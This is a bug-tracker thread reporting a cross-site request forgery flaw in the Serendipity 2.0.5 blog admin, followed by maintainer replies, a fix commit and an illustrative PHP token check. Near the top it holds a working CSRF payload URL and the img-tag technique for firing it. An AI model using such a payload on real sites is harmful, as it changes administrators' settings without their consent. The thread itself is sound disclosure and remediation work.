Hello,
payload: http://127.0.0.1/serendipity/serendipity_admin.php?serendipity[adminModule]=templates&serendipity[adminAction]=install&serendipity[theme]=bartleby&serendipity[spartacus_fetch]=bartleby
Use an <img> tag in another HTML page to request this payload; after Serendipity's admin visits it, the theme will be changed.
<img>
version: 2.0.5
@onli I cannot currently take on this. We should be able to use the same CSRF check we enabled for plugins.
Okay, I assigned you by default since it is security related. I'll add a token check.
@We5ter Thanks for reporting!
cdf3756
I just pushed a fix for this. If you could test the fix as well, that would be greatly appreciated.
Thanks again for the report.
@onli thank you for fixing it.
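A token check of the kind discussed in this thread, as an added example that is not Serendipity's code and not the fix that was pushed. The function names, the `csrf_token` session key and the `serendipity[token]` parameter are hypothetical.

```php
<?php
// Added illustration: names below are hypothetical, not Serendipity's API.

/** Create (once per session) the token the admin UI embeds in its links and forms. */
function issue_admin_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Allow plain views; require a matching session token for any admin action. */
function admin_action_allowed(array $session, array $params): bool
{
    if (!isset($params['serendipity']['adminAction'])) {
        return true; // no action requested, nothing changes state
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $params['serendipity']['token'] ?? '';
    if ($expected === '' || !is_string($supplied)) {
        return false; // no token issued, or a malformed one supplied
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed input: the query string from the report, parsed the way PHP fills $_GET.
$query = 'serendipity[adminModule]=templates&serendipity[adminAction]=install'
       . '&serendipity[theme]=bartleby&serendipity[spartacus_fetch]=bartleby';
parse_str($query, $crossSite);

$session = [];
$token = issue_admin_token($session);

// Request triggered from another site: session cookie present, token absent.
echo 'cross-site: ', admin_action_allowed($session, $crossSite) ? 'allowed' : 'rejected', PHP_EOL;

// Same action issued from the admin UI, which appends the session token.
$fromAdminUi = $crossSite;
$fromAdminUi['serendipity']['token'] = $token;
echo 'admin UI:   ', admin_action_allowed($session, $fromAdminUi) ? 'allowed' : 'rejected', PHP_EOL;
```

The check is deny-by-default for anything carrying `adminAction`, so a newly added admin action is covered without being listed anywhere.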